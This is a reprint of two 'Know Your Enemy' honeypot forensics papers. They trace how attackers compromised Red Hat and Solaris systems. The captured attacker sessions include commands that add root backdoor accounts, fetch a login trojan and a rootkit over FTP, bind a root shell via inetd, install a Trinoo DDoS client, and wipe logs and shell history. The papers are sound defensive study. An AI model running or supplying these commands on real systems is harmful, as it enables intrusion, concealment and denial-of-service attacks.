      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      The Study of an Attack 
      Know Your Enemy: A Forensic Analysis 

      Lance Spitzner http://www.enteract.com/~lspitz/papers.html Last Modified: 
      23 May 2000 

      This paper is a continuation of the Know Your Enemy series. The first 
      three papers covered the tools and tactics of the black-hat community.  
      This paper, the fourth of the series, studies step by step a successful 
      attack of a system.         However, instead of focusing on the tools and 
      tactics used, we will focus on how we learned what happened and pieced the 
      information together.  The purpose is to give you the forensic skills 
      necessary to analyze and learn on your own the threats your organization 
      faces. 

      Background       The information covered here was obtained through the use 
      of a honeypot.  The honeypot was a default server installation of Red Hat 
      6.0.  No modifications were made to the default install, so the 
      vulnerabilities discussed here exist on any default RH 6.0 installation. 
      Also, none of the data presented here has been sanitized.  All IP 
      addresses, user accounts, and keystrokes discussed here are real.  This is 
      done on purpose to both validate the data and give a better understanding 
      of forensic analysis.   Only the passwords have been modified to protect 
      the compromised systems. All sniffer information presented here is in 
      snort format.  Snort is my sniffer and IDS system of choice, due to its 
      flexibility, capabilities, and price (its free).  All actions commited by 
      the black-hat were captured with snort. I use the IDS signatures supplied 
      by Max Vision at www.whitehats.com.  You can query his arachNIDs database 
      for more information on all the alerts discussed throughout this paper.  
      You can find my snort configuration and signature file (including the 
      command line options I use) here. Once you are done reading the paper, you 
      can conduct your own forensic analysis, as I have supplied all the raw 
      data.  As you read this paper, take note of how many different systems the 
      black-hat uses.  Also, throughout this paper, the black-hat is identified 
      as she, but we have no idea what the true gender is. 

      
      The Attack On 26 April, at 06:43 snort alerted me that one of my systems 
      had be attacked with a 'noop' attack.  Packet payloads containing noops 
      are an indication of a buffer overflow attack.  In this case, snort had 
      detected the attack and logged the alert to my /var/log/messages file 
      (which is monitored by swatch). Note: throughout this paper, the IP 
      address 172.16.1.107 is the IP address of the honeypot. All other systems 
      are the IP addresses used by the black-hat. 

      Apr 26 06:43:05 lisa snort[6283]: IDS181/nops-x86: 63.226.81.13:1351 -> 
      172.16.1.107:53 

      My honeypots receive numerous probes, scans and queries on a daily basis.  
      However, an alert like this gets my immediate attention, as it indicates a 
      system may have been compromised.  Sure enough, less then two minutes 
      later system logs indicate the system is       compromised, as our 
      attacker initiates a connection and logins to the box. 

     Apr 26 06:44:25 victim7 PAM_pwdb[12509]: (login) session opened for user twin by (uid=0) 
      Apr 26 06:44:36 victim7 PAM_pwdb[12521]: (su) session opened for user hantu by twin(uid=506) 
      
      Our intruder has gained super user access and now controls the system.  How was this accomplished, what happened?  We will now begin our forensic analysis and put the pieces together, step by step. 
      
      The Analysis 
      When studying an attack, the best place to start is the beginning, where did the black-hat start?  Black-hats normally start with information gathering, they need to determine what vulnerabilities exist before they can strike.  If your system has been compromised, this is
      normally not the first time the black-hat has communicated with that system.  Most attacks involve some type of  information gathering before the attack is launched.  So, this is where we will start, the black-hat's information gathering stage. 
      
      If we look at the alert above, the attack was on port 53.  This indicates a DNS attack was launched on our system.  So I will begin by looking through my snort alerts and find possible information probes for DNS.  We find a DNS version query probe coming from the
      same system that attacked us. 
      
      Apr 25 02:08:07 lisa snort[5875]: IDS277/DNS-version-query: 63.226.81.13:4499 -> 172.16.1.107:53 
      Apr 25 02:08:07 lisa snort[5875]: IDS277/DNS-version-query: 63.226.81.13:4630 -> 172.16.1.101:53 
      
      Notice the date of the probe, April 25.  Our system was attacked April 26, from the same system.  Our system was compromised the day after the probe.  I am guessing that an automated tool was used by our black-hat to scan numerous systems for a known DNS
      vulnerability.  After the scan was ran, the black-hat reviewed the results, identified vulnerable systems (including ours) and then launched her exploit.  We have now pieced together the first part of our story.  Our black-hat scanned us on 25 April, then exploited the
      system the following day.  Based on our IDS alerts, it appears we were hit by a script kiddie with a well known DNS vulnerability.  But how was the attack launched, and how does it work?  Lets find out. 
      
      The Exploit 
      Like most commercial IDS systems, snort has the capability of showing us the packet load data of all IP packets.  We will use this capability to conduct an analysis of the exploit.  The exploit information was obtained from the snort logs (stored in tcpdump binary
      format).  I queried the snort log and began reviewing the packets starting when the attack was launched.  I did not limit my information query to the host 63.336.81.13, as the attacker may have used other systems.  This is in fact the case, as our black-hat used at least
      three different systems to run the exploit. The goal of the exploit is to gain a root shell on the remote system.  Once the black-hat gains a root shell, they can run any command as root.  Normally an account is placed in the /etc/passwd and /etc/shadow file.  You can
      find both the exploit and remote commands executed in the detailed forensic analysis.  Once the exploit was ran and a root shell obtained, the following commands were ran as root. 
      
      cd /; uname -a; pwd; id; 
      Linux apollo.uicmba.edu 2.2.5-15 #1 Mon Apr 19 22:21:09 EDT 1999 i586 unknown 
      / 
      uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) 
      echo "twin::506:506::/home/twin:/bin/bash" >> /etc/passwd 
      echo "twin:w3nT2H0b6AjM2:::::::" >> /etc/shadow 
      
      echo "hantu::0:0::/:/bin/bash" >> /etc/passwd 
      echo "hantu:w3nT2H0b6AjM2:::::::" >> /etc/shadow 
      
      Our black-hat runs several commands as root.  First, she confirms the system she is on (uname -a), the directory (pwd) and then confirms her uid (id).  She then adds two user accounts to the system, twin and hantu, both with the same password.  Note that twin
      has the UID of 506 and hantu has the UID of 0 (on a side note, hantu means ghost in Indonesian).  Remeber, most systems do not let UID 0 telnet to the box. So she had to create an account that would give her remote access, then another account that would give
      her UID 0. So, our black-hat ran an exploit on DNS, gained a root shell, then inserted two accounts.  Within 90 seconds of the exploit she telnets into the box and gains root access (see timestamps of logs below). So, what does she do next? 
      
      Apr 26 06:43:05 lisa snort[6283]: IDS181/nops-x86: 63.226.81.13:1351 -> 172.16.1.107:53 
      Apr 26 06:44:25 victim7 PAM_pwdb[12509]: (login) session opened for user twin by (uid=0) 
      Apr 26 06:44:36 victim7 PAM_pwdb[12521]: (su) session opened for user hantu by twin(uid=506) 
      
      Gaining Access 
      Fortunately for us, telnet is a plaintext protocol, the data is not encrypted.  This means we can decode the sniffer traces and capture all the her keystrokes.  Snort has already done this for us, another reason I prefer snort.  By analyzing the keystrokes snort captured of
      the telnet sessions, we can determine what our black-hat does.  What I like best about decoding telnet sessions as we capture not only STDIN (the keystrokes) but STDOUT and STDER.  Lets review the telnet sessions and identify the black-hats activities
      (comments in RED). 
      
      First, our friend telnets to the box (from 213.28.22.189) as twin and then gains superuser access as hantu. Remeber, she cannot just telnet in as hantu as UID 0 is restricted for remote access.
      
       #' !"'!"# ' 9600,9600'VT5444VT5444 
      Red Hat Linux release 6.0 (Shedwig) 
      Kernel 2.2.5-15 on an i586 
      login: twin 
      Password: Password: hax0r 
      No directory /home/twin! 
      Logging in with home = "/". 
      [twin@apollo /]$ su hantu 
      Password: Password: hax0r 
      
      Next, our friend ftps to another system to get her toolkit. 
      
      [root@apollo /]# ftp 24.112.167.35 
      Connected to 24.112.167.35. 
      220 linux FTP server (Version wu-2.5.0(1) Tue Sep 21 16:48:12 EDT 1999) ready. 
      Name (24.112.167.35:twin): welek 
      331 Password required for welek. 
      Password:password 
      230 User welek logged in. 
      Remote system type is UNIX. 
      Using binary mode to transfer files. 
      ftp> get bj.c 
      local: bj.c remote: bj.c 
      200 PORT command successful. 
      150 Opening BINARY mode data connection for bj.c (1010 bytes). 
      226 Transfer complete. 
      1010 bytes received in 0.115 secs (8.6 Kbytes/sec) 
      ftp> quit 
      221-You have transferred 1010 bytes in 1 files. 
      221-Total traffic for this session was 1421 bytes in 1 transfers. 
      221-Thank you for using the FTP service on linux. 
      221 Goodbye. 
      
      Third, she grabs her backdoor, compiles bj.c, and installs it as a replacement for /sbin/login. Notice all the commands executed at the command prompt for the compile. It appears that all the
      compile commands were executed 'cut and paste' style. 
      
      [root@apollo /]# gcc -o login bj.cchown root:bin loginchmod 4555 loginchmod u-w logincp /bin/login /usr/bin/xstatcp /bin/login /usr/bin/old                 rm /bin/loginchmod 555
      /usr/bin/xstatchgrp bin /usr/bin/xstatmv login /bin/loginrm bj.cgcc -o login bj.c 
      bj.c:16: unterminated string or character constant 
      bj.c:12: possible real start of unterminated constant 
      
      She now attempts to implement the compiled backdoor 
      
      [root@apollo /]# chown root:bin login 
      chown: login: No such file or directory 
      [root@apollo /]# chmod 4555 login 
      chmod: login: No such file or directory 
      [root@apollo /]# chmod u-w login 
      chmod: login: No such file or directory 
      [root@apollo /]# cp /bin/login /usr/bin/xstat 
      [root@apollo /]# cp /bin/login /usr/bin/old 
      [root@apollo /]# rm /bin/login 
      [root@apollo /]# chmod 555 /usr/bin/xstat 
      [root@apollo /]# chgrp bin /usr/bin/xstat 
      [root@apollo /]# mv login /bin/login 
      mv: login: No such file or directory 
      [root@apollo /]# rm bj.c 
      
      Dooh!  She just can't get it right, lets try again. She ftp's to the site re-downloads the backdoor. 
      
      [root@apollo /]# ftp 24.112.167.35 
      Connected to 24.112.167.35. 
      220 linux FTP server (Version wu-2.5.0(1) Tue Sep 21 16:48:12 EDT 1999) ready. 
      Name (24.112.167.35:twin): [root@apollo /]#   ftp 24.112.167.35 
      Connected to 24.112.167.35. 
      220 linux FTP server (Version wu-2.5.0(1) Tue Sep 21 16:48:12 EDT 1999) ready. 
      Name (24.112.167.35:twin): welek 
      331 Password required for welek. 
      Password:331 Password required for welek. 
      Password:password 
      230 User welek logged in. 
      Remote system type is UNIX. 
      Using binary mode to transfer files. 
      ftp> get bj.c 
      qulocal: bj.c remote: bj.c 
      200 PORT command successful. 
      u150 Opening BINARY mode data connection for bj.c (1011 bytes). 
      226 Transfer complete. 
      1011 bytes received in 0.134 secs (7.3 Kbytes/sec) 
      ftp> itit 
      221-You have transferred 1011 bytes in 1 files. 
      221-Total traffic for this session was 1422 bytes in 1 transfers. 
      221-Thank you for using the FTP service on linux. 
      221 Goodbye. 
      
      This is now her second attempt at compiling the backdoor. Notice the exact same "cut and paste" commands are used. 
      
      [root@apollo /]# gcc -o login bj.cchown root:bin loginchmod 4555 loginchmod u-w logincp /bin/login /usr/bin/xstatcp /bin/login /usr/bin/old                 rm /bin/loginchmod 555
      /usr/bin/xstatchgrp bin /usr/bin/xstatmv login /bin/loginrm bj.cgcc -o login bj.c 
      bj.c: In function `owned': 
      bj.c:16: warning: assignment makes pointer from integer without a cast 
      
      Now we see the compiled backdoor implemented. The valid copy of /bin/login is moved to /usr/bin/xstat, while the compiled trojan bj.c is used to replace /bin/login. This is the backdoor. This
      trojan allows anyone with the TERM setting of vt9111 unauthorized access 
      
      [root@apollo /]# chown root:bin login 
      [root@apollo /]# chmod 4555 login 
      [root@apollo /]# chmod u-w login 
      [root@apollo /]# cp /bin/login /usr/bin/xstat 
      cp: /bin/login: No such file or directory 
      [root@apollo /]# cp /bin/login /usr/bin/old 
      cp: /bin/login: No such file or directory 
      [root@apollo /]# rm /bin/login 
      rm: cannot remove `/bin/login': No such file or directory 
      [root@apollo /]# chmod 555 /usr/bin/xstat 
      [root@apollo /]# chgrp bin /usr/bin/xstat 
      [root@apollo /]# mv login /bin/login 
      
      Now she covers her moves.  I believe this is scripted, cut and paste.  Look at all the commands she executed at a single command prompt.  Also, I believe this is a 'generic' clean up script,
      notice how it tries to remove files that do not exist (such as /tmp/h). 
      
      [root@apollo /]# rm bj.c 
      [root@apollo /]# [root@apollo /]# ps -aux | grep inetd ; ps -aux | grep portmap ; rm /sbin/portmap ; rm /tmp/h ; rm /usr/sbin/rpc.portmap ; rm -rf .bash* ; rm -rf /root/.bash_history ; rm -rf
      /usr/sbin/namedps -aux | grep inetd ; ps -aux | grep portmap ; rm /sbin/por<grep inetd ; ps -aux | grep portmap ; rm /sbin/port                         map ; rm /tmp/h ; rm /usr<p portmap ; rm
      /sbin/portmap ; rm /tmp/h ; rm /usr/                         sbin/rpc.portmap ; rm -rf<ap ; rm /tmp/h ; rm /usr/sbin/rpc.portmap ; rm -rf                          .bash* ; rm -rf
      /root/.ba<bin/rpc.portmap ; rm -rf .bash* ; rm -rf /root/.bas                         h_history ; rm -rf /usr/s<bash* ; rm -rf /root/.bash_history ; rm -rf /usr/sb                        
      in/named 
        359 ?        00:00:00 inetd 
        359 ?        00:00:00 inetd 
      rm: cannot remove `/tmp/h': No such file or directory 
      rm: cannot remove `/usr/sbin/rpc.portmap': No such file or directory 
      [root@apollo /]# ps -aux | grep portmap 
      [root@apollo /]# [root@apollo /]# ps -aux | grep inetd ; ps -aux | grep portmap ; rm /sbin/portmap ; rm /tmp/h ; rm /usr/sbin/rpc.portmap ; rm -rf .bash* ; rm -rf /root/.bash_history ; rm -rf
      /usr/sbin/namedps -aux | grep inetd ; ps -aux | grep portmap ; rm /sbin/por<grep inetd ; ps -aux | grep portmap ; rm /sbin/port                         map ; rm /tmp/h ; rm /usr<p portmap ; rm
      /sbin/portmap ; rm /tmp/h ; rm /usr/                         sbin/rpc.portmap ; rm -rf<ap ; rm /tmp/h ; rm /usr/sbin/rpc.portmap ; rm -rf                          .bash* ; rm -rf
      /root/.ba<bin/rpc.portmap ; rm -rf .bash* ; rm -rf /root/.bas                         h_history ; rm -rf /usr/s<bash* ; rm -rf /root/.bash_history ; rm -rf /usr/sb                        
      in/named 
        359 ?        00:00:00 inetd 
      rm: cannot remove `/sbin/portmap': No such file or directory 
      rm: cannot remove `/tmp/h': No such file or directory 
      rm: cannot remove `/usr/sbin/rpc.portmap': No such file or directory 
      [root@apollo /]# rm: cannot remove `/sbin/portmap': No such file or directory 
      
      I find this interesting. Our black-hat's generic clean up script generated errors as it attempted to remove files that did not exist. I belive our black-hat saw these errors and became
      concerened, because she then attempts to manually remove these same files, even though they do not exist. 
      
      rm: cannot remove `/tmp/h': No such file or directory 
      rm: cannot remove `/usr/sbin/rpc.portmap': No such file or directory 
      [root@apollo /]# rm: cannot remove `/sbin/portmap': No such file or directory 
      rm: cannot remove `/tmp/h': No such file or directory 
      rm: cannot remove `/usr/sbin/rpc.portmap': No such file or directory 
      [root@apollo /]# exit 
      exit 
      [twin@apollo /]$ exit 
      logout 
      
      That's it, our friend has installed a backdoor, bj.c.  The backdoor allows unauthenticated users in based on the TERM setting, in this case VT9111.  Once completed, she logged out from the
      system. 
      
      After leaving the system, the black hat made several more connections and modificaitons to the systems.  Review the raw data to review the black-hats keystrokes. 
      
      Trinoo, The Return 
      Once the system had been compromised, I took it offline to review the data (such as Tripwire).  However, I noticed over the next week that a variety of systems were attempting to telnet to the box.  Apparently the black-hat wanted back in, most likely to use the
      compromised system for more nefarious activity.  So, I brought the compromised box back online, curious to see if the black-hat would return and what she would do.  Sure enough, almost two weeks later, she returned.  Once again, we captured all the keystrokes
      using snort.  Review the following telnet sessions and learn how our compromised system was to be used as a Trinoo client. 
      
      On May 9, 10:45 am, our friend telnets in from 24.7.85.192.  Note how she uses the backdoor VT9111 to get into the system, bypassing authentication. 
      
       !"' #'!"# ' 9600,9600'VT9111VT9111 
      Red Hat Linux release 6.0 (Shedwig) 
      Kernel 2.2.5-15 on an i586 
      [root@apollo /]# ls 
      bin   cdrom  etc     home  lost+found  proc  sbin  usr 
      boot  dev    floppy  lib   mnt       root  tmp   var 
      
      Once on the system, she attempts to use DNS.  However, DNS is still broken on the box.  Remember, DNS was exploited to gain root access, so the system can no longer resolve domain names. 
      
      [root@apollo /]# nslookup magix 
      
      [root@apollo /]# nslookup irc.powersurf.com 
      Server:  zeus-internal.uicmba.edu 
      Address:  172.16.1.101 
      
      The black-hat ftp's to a system in Singapore and downloads a new tool kit.  Notice the 'hidden' directory .s she creates to store the toolkit. 
      
      [root@apollo /]# mkdir .s 
      [root@apollo /]# cd .s 
      [root@apollo /.s]# ftp nusnet-216-35.dynip.nus.edu.sg 
      ftp: nusnet-216-35.dynip.nus.edu.sg: Unknown host 
      ftp> qquituit 
      [root@apollo /.s]# ftpr 137.132.216.35 
      login: ftrp: command not found 
      [root@apollo /.s]# 
      [root@apollo /.s]# ftp 137.132.216.35 
      Connected to 137.132.216.35. 
      220 nusnet-216-35.dynip.nus.edu.sg FTP server (Version wu-2.4.2-VR17(1) Mon Apr 19 09:21:53 EDT 1999) ready. 
      
      She gains access with the same user name that was inserted in our box. 
      
      Name (137.132.216.35:root): twin 
      331 Password required for twin. 
      Password:hax0r 
      230 User twin logged in. 
      Remote system type is UNIX. 
      Using binary mode to transfer files. 
      ftp> get d.tar.gz 
      local: d.tar.gz remote: d.tar.gz 
      200 PORT command successful. 
      150 Opening BINARY mode data connection for d.tar.gz (8323 bytes). 
      150 Opening BINARY mode data connection for d.tar.gz (8323 bytes). 
      226 Transfer complete. 
      8323 bytes received in 1.36 secs (6 Kbytes/sec) 
      ftp> quit 
      221-You have transferred 8323 bytes in 1 files. 
      221-Total traffic for this session was 8770 bytes in 1 transfers. 
      221-Thank you for using the FTP service on nusnet-216-35.dynip.nus.edu.sg. 
      221 Goodbye. 
      [root@apollo /.s]# gunzip d* 
      [root@apollo /.s]# tar -xvf d* 
      daemon/ 
      daemon/ns.c 
      daemon/ns 
      [root@apollo /.s]# rm -rf d.tar 
      [root@apollo /.s]# cd daemon 
      [root@apollo daemon]# chmod u+u+x nsx ns 
      [root@apollo daemon]# ./ns 
      
      Our black-hat has just installed and started Trinoo client.  Next, she attempts to hop to another compromised system.  Notice how she sets her VT TERM.  This system most likely also has a
      backdoor.  The connection fails since DNS is not working. 
      
      [root@apollo daemon]# TERM=vt1711 
      [root@apollo daemon]# telnet macau.hkg.com 
      macau.hkg.com: Unknown host 
      [root@apollo daemon]# exit 
      exit 
      
      Our friend leaves, only to return later from yet a different system (137.132.216.35) and attempt more michief. 
      
       !"' #'!"# ' 9600,9600'VT9111VT9111 
      Red Hat Linux release 6.0 (Shedwig) 
      Kernel 2.2.5-15 on an i586 
      apollo /]# TERM=vt9111 
      telnet ns2.cpcc.cc.nc.us 
      ns2.cpcc.cc.nc.us: Unknown host 
      @apollo /}#telnet 1 152.43.29.52 
      Trying 152.43.29.52... 
      Connected to 152.43.29.52. 
      Escape character is '^]'. 
      !!!!!!Connection closed by foreign host. 
      te8ot@apollo /]# TERM=vt7877 
      [root@apollo /]# telnet sparky.w 
      itoot@apollo /]# exit 
      exit 
      
      Following this, several attempts were made to use the system as a Trinoo attack against other systems. At this point I disconnected the system.  The black-hat intended to use the compromised system for destructive purposes and little more could be gained from the
      monitoring the connection. 
      
      May 9 11:03:20 lisa snort[2370]: IDS/197/trin00-master-to-daemon: 137.132.17.202:2984 -> 172.16.1.107:27444 
      May 9 11:03:20 lisa snort[2370]: IDS187/trin00-daemon-to-master-pong: 172.16.1.107:1025 -> 137.132.17.202:31335 
      May 9 11:26:04 lisa snort[2370]: IDS197/trin00-master-to-daemon: 137.132.17.202:2988 -> 172.16.1.107:27444 
      May 9 11:26:04 lisa snort[2370]: IDS187/trin00-daemon-to-master-pong: 172.16.1.107:1027 -> 137.132.17.202:31335 
      May 9 20:48:14 lisa snort[2370]: IDS197/trin00-master-to-daemon: 137.132.17.202:3076 -> 172.16.1.107:27444 
      May 9 20:48:14 lisa snort[2370]: IDS187/trin00-daemon-to-master-pong: 172.16.1.107:1028 -> 137.132.17.202:31335 
      
      Summary 
      We have just covered step by step how a honeypot was compromised, backdoored, and eventually used for a Trinoo attack.  On 25 April, the black-hat first scanned the honeypot for which version of DNS version it was running.  The following day, on 26 April, she
      executed the NXT-Named exploit to gain a root shell (see the NXT-Howto for a black-hat HOWTO on the exploit). Once she gained a root shell, she created two system accounts, twin and hantu.  Following this she immediately telneted to the box, gained super user
      access, then downloaded and installed her backdoor, bj.c.  She then executed a script to cover her tracks and then left the system.  Over the following weeks she attempted to connect to the system, however it was offline.  Finally, on May 9 she gained access,
      installed and then executed Trinoo.  At this point the honeypot was taken offline for good.  The majority of forensics was conducted using system logs from the compromised system and snort logs and alerts. Several other people have contributed additional analysis of
      the attack. 
      
      Conclusion 
      We have just covered a step by step analysis of how a honeypot compromised.  The goal was to determine how the system was compromised using forensic anaylisis of system and IDS logs.  By analyzing this attack, you should have a better understanding of what to
      expect and look for when analyzing a system attack. If you would like to learn more about how this information was obtained, check out To Build A Honeypot. 
      
      I would like to thank both Marty Roesch and Max Vision for their contribution to the security community.  What I have learned here would not have been possible without their hard work. All logs and information were forwarded to CERT before this information was
      released. Also, attempts were made to contact all IPs involved in the attack. 

      @HWA


305.0 [IND] Paper: Know your enemy #4 by Lance Spitzner : The motives
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      The Motives and Psychology of the Black-hat Community 
      Know Your Enemy: Motives 

      Written by the Honeynet Project
      Last Modified: 27 June, 2000 
      
      This paper is a continuation of the Know Your Enemy series. This series is dedicated to learning the tools and tactics of the black-hat community. Unlike the previous papers which focused purely on the "what" and "how" of the black-hat
      community, specifically the technical tools, their use and implementation, this paper explores the motivation and psychology of the black-hat community, in their very own words. Part I starts with the compromise of a Solaris 2.6 system. Part
      II provides information rarely published, a record of conversations and actions which took place over a fourteen-day period following the compromise of a honeypot system. Learn how and why black-hats attack systems. Once the Solaris 2.6
      system was compromised, the black-hat put an IRC bot on our system.  This bot, configured and implemented by the black-hat, captured all their conversations on an IRC channel.  We monitored these conversations over a two week period,
      all of which are contained here.  This paper is not meant to be a generalization of the black-hat community. Instead, we present a specific incident involving several individuals. However, this should give you an idea of how certain members
      can think and behave. This is a common threat that we all face in the security community, and we sincerely hope other security professionals benefit from this work. 
      
      This information was obtained through the use of a honeynet. A honeynet is a network of various honeypots, designed to be compromised by the black-hat community. While some honeypots are used to divert the attention of attackers from
      legitimate systems, the purpose of a honeynet is to learn the tools and tactics of the black-hat community. Most of the information provided in this document has been sanitized.  Specifically, user identities and passwords, credit card
      numbers, and most of the system names involved have all been changed. However, the actual technical tools and the chat sessions themselves have not been sanitized. All this information was forwarded to both CERT and the FBI before
      being released.   Also, over 370 notifications were sent out to administrators of systems we believed were compromised. 
      
      Foreword, by Brad Powell 
      
      Part I: The Compromise 
      A Solaris 2.6 default installation was used for our honeypot. No modifications or patches were installed on the system. The vulnerabilities discussed here exist in any default, unpatched installation of Solaris 2.6. That is the whole purpose of the honeynet, to identify
      vulnerabilities in production systems and learn how they are exploited. When exploited, we can then learn the tools and tactics of the black-hat community. The honeynet itself is an environment designed to track the black-hat's every move. 
      
      On June 4, 2000 our Solaris 2.6 honeypot was compromised with the rpc.ttdbserv Solaris exploit, which allows the execution of code via a buffer overflow in the ToolTalk object database server (CVE-1999-0003). Note that this exploit is also listed as #3 in SANS Top
      Ten List. This attack was both detected and alerted by snort, a sniffer based IDS system. 
      
      Jun 4 11:37:58 lisa snort[5894]: IDS241/rpc.ttdbserv-solaris-kill: 192.168.78.12:877 -> 172.16.1.107:32775 
      
      The rpc.ttdbserv exploit is a buffer overflow attack that allows the remote user to execute commands on the system as root. The following command was executed, giving the black-hat a backdoor. The service ingreslock (predefined in /etc/services as port 1524) is
      added to a file called '/tmp/bob', and then inetd is executed with '/tmp/bob' as the configuration file. /bin/sh is then bound to port 1524 and is running as root, giving the remote user root access. 
      
      /bin/ksh -c echo 'ingreslock stream tcp nowait root /bin/sh sh -i' >>/tmp/bob ; /usr/sbin/inetd -s /tmp/bob. 
      
      Once the black-hat created this backdoor, he connected to port 1524, accessed a shell as root, and executed the following commands.  He creates two user accounts, so he can telnet back in.  Notice the errors and control characters, the shell on port 1524 does not
      have a proper environment. 
      
      # cp /etc/passwd /etc/.tp; 
      ^Mcp /etc/shadow /etc/.ts; 
      echo "r:x:0:0:User:/:/sbin/sh" >> /etc/passwd; 
      echo "re:x:500:1000:daemon:/:/sbin/sh" >> /etc/passwd; 
      echo "r::10891::::::" >> /etc/shadow; 
      echo "re::6445::::::" >> /etc/shadow; 
      : not found 
      # ^M: not found 
      # ^M: not found 
      # ^M: not found 
      # ^M: not found 
      # ^M: not found 
      # who; 
      rsides     console      May 24 21:09 
      ^M: not found 
      # exit; 
      
      Our black-hat now has two accounts on our compromised system.  He can now telnet it as the user 're', then su to the user 'r', which has UID 0, thus gaining root access.  We will now review the actual keystrokes of the black-hat as they do just that, and more. 
      
       !"' !"P#$#$'LINUX' 
      
      SunOS 5.6 
      
      login: re 
      Choose a new password. 
      New password: abcdef 
      Re-enter new password: abcdef 
      telnet (SYSTEM): passwd successfully changed for re 
      Sun Microsystems Inc.   SunOS 5.6       Generic August 1997 
      $ su r 
      
      Our black-hat now has root access.  As common, the next step is retrieve the rootkit and take control of the system .  First, we see the black-hat create a 'hidden' directory to hide the rootkit. 
      
      # mkdir /dev/".. " 
      # cd /dev/".. " 
      
      After creating the directory, the black-hat retrieves the rootkit from another system. 
      
      # ftp shell.example.net 
      Connected to shell.example.net. 
      220 shell.example.net FTP server (Version 6.00) ready. 
      Name (shell.example.net:re): j4n3 
      331 Password required for j4n3. 
      Password:abcdef 
      230 User j4n3 logged in. 
      ftp> get sun2.tar 
      200 PORT command successful. 
      150 Opening ASCII mode data connection for 'sun2.tar' (1720320 bytes). 
      226 Transfer complete. 
      local: sun2.tar remote: sun2.tar 
      1727580 bytes received in 2.4e+02 seconds (6.90 Kbytes/s) 
      ftp> get l0gin 
      200 PORT command successful. 
      150 Opening ASCII mode data connection for 'l0gin' (47165 bytes). 
      226 Transfer complete. 
      226 Transfer complete. 
      local: l0gin remote: l0gin 
      47378 bytes received in 7.7 seconds (6.04 Kbytes/s) 
      ftp> quit 
      U221 Goodbye. 
      
      Once the rootkit is successfully downloaded, the kit is untared and installed.  Notice how the entire rootkit is installed by executing a single script, setup.sh. This script also calls another script, secure.sh. You can download the entire Solaris rootkit used in this attack
      here. 
      
      # tar -xvf sun2.tar 
      x sun2, 0 bytes, 0 tape blocks 
      x sun2/me, 859600 bytes, 1679 tape blocks 
      x sun2/ls, 41708 bytes, 82 tape blocks 
      x sun2/netstat, 6784 bytes, 14 tape blocks 
      x sun2/tcpd, 19248 bytes, 38 tape blocks 
      x sun2/setup.sh, 1962 bytes, 4 tape blocks 
      x sun2/ps, 35708 bytes, 70 tape blocks 
      x sun2/packet, 0 bytes, 0 tape blocks 
      x sun2/packet/sunst, 9760 bytes, 20 tape blocks 
      x sun2/packet/bc, 9782 bytes, 20 tape blocks 
      x sun2/packet/sm, 32664 bytes, 64 tape blocks 
      x sun2/packet/newbc.txt, 762 bytes, 2 tape blocks 
      x sun2/packet/syn, 10488 bytes, 21 tape blocks 
      x sun2/packet/s1, 12708 bytes, 25 tape blocks 
      x sun2/packet/sls, 19996 bytes, 40 tape blocks 
      x sun2/packet/smaq, 10208 bytes, 20 tape blocks 
      x sun2/packet/udp.s, 10720 bytes, 21 tape blocks 
      x sun2/packet/bfile, 2875 bytes, 6 tape blocks 
      x sun2/packet/bfile2, 3036 bytes, 6 tape blocks 
      x sun2/packet/bfile3, 20118 bytes, 40 tape blocks 
      x sun2/packet/sunsmurf, 11520 bytes, 23 tape blocks 
      x sun2/sys222, 34572 bytes, 68 tape blocks 
      x sun2/m, 9288 bytes, 19 tape blocks 
      x sun2/l0gin, 47165 bytes, 93 tape blocks 
      x sun2/sec, 1139 bytes, 3 tape blocks 
      x sun2/pico, 222608 bytes, 435 tape blocks 
      x sun2/sl4, 28008 bytes, 55 tape blocks 
      x sun2/fix, 10360 bytes, 21 tape blocks 
      x sun2/bot2, 508 bytes, 1 tape blocks 
      x sun2/sys222.conf, 42 bytes, 1 tape blocks 
      x sun2/le, 21184 bytes, 42 tape blocks 
      x sun2/find, 6792 bytes, 14 tape blocks 
      x sun2/bd2, 9608 bytes, 19 tape blocks 
      x sun2/snif, 16412 bytes, 33 tape blocks 
      x sun2/secure.sh, 1555 bytes, 4 tape blocks 
      x sun2/log, 47165 bytes, 93 tape blocks 
      x sun2/check, 46444 bytes, 91 tape blocks 
      x sun2/zap3, 13496 bytes, 27 tape blocks 
      x sun2/idrun, 188 bytes, 1 tape blocks 
      x sun2/idsol, 15180 bytes, 30 tape blocks 
      x sun2/sniff-10mb, 16488 bytes, 33 tape blocks 
      x sun2/sniff-100mb, 16496 bytes, 33 tape blocks 
      # rm sun2.tar 
      # mv l0gin sun2 
      #cd sun2 
      #./setup.sh 
      hax0r w1th K1dd13 
      Ok This thing is complete :-) 
      
      Here the rootkit installation script first cleans out the log files to delete the information associated with the black-hat's activities. 
      
      - WTMP: 
      /var/adm/wtmp is Sun Jun  4 11:47:39 2000 
      /usr/adm/wtmp is Sun Jun  4 11:47:39 2000 
      /etc/wtmp is Sun Jun  4 11:47:39 2000 
      /var/log/wtmp cannot open 
      WTMP = /var/adm/wtmp 
      Removing user re at pos: 1440 
      Done! 
      - UTMP: 
      /var/adm/utmp is Sun Jun  4 11:47:39 2000 
      /usr/adm/utmp is Sun Jun  4 11:47:39 2000 
      /etc/utmp is Sun Jun  4 11:47:39 2000 
      /var/log/utmp cannot open 
      /var/run/utmp cannot open 
      UTMP = /var/adm/utmp 
      Removing user re at pos: 288 
      Done! 
      - LASTLOG: 
      /var/adm/lastlog is Sun Jun  4 11:47:39 2000 
      /usr/adm/lastlog is Sun Jun  4 11:47:39 2000 
      /etc/lastlog cannot open 
      /var/log/lastlog cannot open 
      LASTLOG = /var/adm/lastlog 
      User re has no wtmp record. Zeroing lastlog.. 
      - WTMPX: 
      /var/adm/wtmpx is Sun Jun  4 11:47:39 2000 
      /usr/adm/wtmpx is Sun Jun  4 11:47:39 2000 
      /etc/wtmpx is Sun Jun  4 11:47:39 2000 
      /var/log/wtmpx cannot open 
      WTMPX = /var/adm/wtmpx 
      Done! 
      - UTMPX: 
      /var/adm/utmpx is Sun Jun  4 11:47:39 2000 
      /usr/adm/utmpx is Sun Jun  4 11:47:39 2000 
      /etc/utmpx is Sun Jun  4 11:47:39 2000 
      /var/log/utmpx cannot open 
      /var/run/utmpx cannot open 
      UTMPX = /var/adm/utmpx 
      Done! 
